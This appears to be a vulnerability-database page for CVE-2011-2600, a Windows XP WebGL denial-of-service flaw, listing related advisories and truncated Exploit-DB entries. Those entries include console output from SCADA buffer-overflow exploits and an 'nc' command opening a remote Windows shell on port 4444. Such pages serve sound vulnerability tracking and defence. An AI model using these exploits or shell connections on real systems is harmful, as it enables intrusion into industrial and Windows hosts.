CVE-2011-2600
published 2011-06-30CVE-2011-2600: The GPU support functionality in Windows XP does not properly restrict rendering time, which allows remote attackers to cause a denial of service (system…
PriorityP429high7.1CVSS 2.0
AVNACMAuNCNINAC
EPSS
11.76%
95.5th percentile
The GPU support functionality in Windows XP does not properly restrict rendering time, which allows remote attackers to cause a denial of service (system crash) via vectors involving WebGL and (1) shader programs or (2) complex 3D geometry, as demonstrated by using Mozilla Firefox or Google Chrome to visit the lots-of-polys-example.html test page in the Khronos WebGL SDK.
CVSS provenance
nvdv2.07.1HIGHAV:N/AC:M/Au:N/C:N/I:N/A:C
vendor_cisco7.8HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-557v-4rgm-gh3h: The GPU support functionality in Windows XP does not properly restrict rendering time, which allows remote attackers to cause a denial of service (sys
ghsa_unreviewed·2022-05-17
CVE-2011-2600 [HIGH] GHSA-557v-4rgm-gh3h: The GPU support functionality in Windows XP does not properly restrict rendering time, which allows remote attackers to cause a denial of service (sys
The GPU support functionality in Windows XP does not properly restrict rendering time, which allows remote attackers to cause a denial of service (system crash) via vectors involving WebGL and (1) shader programs or (2) complex 3D geometry, as demonstrated by using Mozilla Firefox or Google Chrome to visit the lots-of-polys-example.html test page in the Khronos WebGL SDK.
Cisco
Denial of Service Vulnerability in Cisco Video Surveillance IP Cameras
vendor_cisco·2011-10-26·CVSS 7.8
CVE-2011-3318 [HIGH] Denial of Service Vulnerability in Cisco Video Surveillance IP Cameras
Denial of Service Vulnerability in Cisco Video Surveillance IP Cameras
A denial of service (DoS) vulnerability exists in the Cisco Video Surveillance IP Cameras 2421, 2500 series and 2600 series of devices. An unauthenticated, remote attacker could exploit this vulnerability by sending crafted RTSP TCP packets to an affected device. Successful exploitation prevents cameras from sending video streams, subsequently causing a reboot. The camera reboot is done automatically and does not require action from an operator.
There are no workarounds available to mitigate exploitation of this vulnerability that can be applied on the Cisco Video Surveillance IP Cameras. Mitigations that can be deployed on Cisco devices within the network are available.
This advisory is posted at https://sec.cloudap
Cisco
Denial of Service Vulnerability in Cisco Video Surveillance IP Cameras
vendor_cisco
CVE-2011-3318 Denial of Service Vulnerability in Cisco Video Surveillance IP Cameras
CVE-2011-3318: Denial of Service Vulnerability in Cisco Video Surveillance IP Cameras
A denial of service (DoS) vulnerability exists in the Cisco Video Surveillance IP Cameras 2421, 2500 series and 2600 series of devices. An unauthenticated, remote attacker could exploit this vulnerability by sending crafted RTSP TCP packets to an affected device. Successful exploitation prevents cameras from sending video streams, subsequently causing a reboot. The camera reboot is done automatically and does not require action from an operator. There are no
Bug IDs: CSCtj39462, CSCtj96312, CSCtl80175, CSCtj96312, CSCtj39462
No detection rules found.
Exploit-DB
Microsoft Windows (x86) - 'NDISTAPI' Local Privilege Escalation (MS11-062)
exploitdb·2016-10-24
CVE-2011-1974 Microsoft Windows (x86) - 'NDISTAPI' Local Privilege Escalation (MS11-062)
Microsoft Windows (x86) - 'NDISTAPI' Local Privilege Escalation (MS11-062)
---
/*
################################################################
# Exploit Title: Windows x86 (all versions) NDISTAPI privilege escalation (MS11-062)
# Date: 2016-10-24
# Exploit Author: Tomislav Paskalev
# Vulnerable Software:
# Windows XP SP3 x86
# Windows XP Pro SP2 x64
# Windows Server 2003 SP2 x86
# Windows Server 2003 SP2 x64
# Windows Server 2003 SP2 Itanium-based Systems
# Supported Vulnerable Software:
# Windows XP SP3 x86
# Windows Server 2003 SP2 x86
# Tested Software:
# Windows XP Pro SP3 x86 EN [5.1.2600]
# Windows Server 2003 Ent SP2 EN [5.2.3790]
# CVE ID: 2011-1974
################################################################
# Vulnerability description:
# An elevation of privilege vulner
Exploit-DB
CoDeSys SCADA 2.3 - Remote Buffer Overflow
exploitdb·2011-12-01
CVE-2011-5007 CoDeSys SCADA 2.3 - Remote Buffer Overflow
CoDeSys SCADA 2.3 - Remote Buffer Overflow
---
/*
See Also: http://aluigi.altervista.org/adv/codesys_1-adv.txt
CoDeSys v2.3 Industrial Control System Development Software
Remote Buffer Overflow Exploit for CoDeSys Scada webserver
Author : Celil UNUVER, SignalSEC Labs
www.signalsec.com
Tested on WinXP SP1 EN
THIS CODE IS FOR EDUCATIONAL PURPOSES ONLY!
--snip--
root@bt:~# ./codesys 192.168.1.36
CoDeSys v2.3 webserver Remote Exploit
by SignalSEC Labs - www.signalsec.com
[+]Sending payload to SCADA system!
[+]Connecting to port 4444 to get shell!
192.168.1.36: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.1.36] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Program Files\3S Software\CoDeSys V
Exploit-DB
ScadaTEC ModbusTagServer & ScadaPhone - '.zip' Local Buffer Overflow
exploitdb·2011-09-12
CVE-2011-4535 ScadaTEC ModbusTagServer & ScadaPhone - '.zip' Local Buffer Overflow
ScadaTEC ModbusTagServer & ScadaPhone - '.zip' Local Buffer Overflow
---
[mr_me@neptune scadatec]$ php zip.php -t modbustagserver
[mr_me@neptune scadatec]$ nc -v 192.168.114.141 4444
Connection to 192.168.114.141 4444 port [tcp/krb524] succeeded!
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\ScadaTEC\ModbusTagServer\Projects>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'The reason they call it the American Dream is because you have to be asleep
to believe it.' ~ George Carlin
*/
if ($argc
software: target software
Example:
php ".$argv[0]." -t scadaphone
php ".$argv[0]." -t modbustagserver
"); die; }
function setArgs($argv){
$_ARG = array();
foreach ($argv as $arg){
if (ereg("--([^=]+)=(.*)", $arg, $reg)){
$_ARG[$
No writeups or analysis indexed.
2011-06-30
Published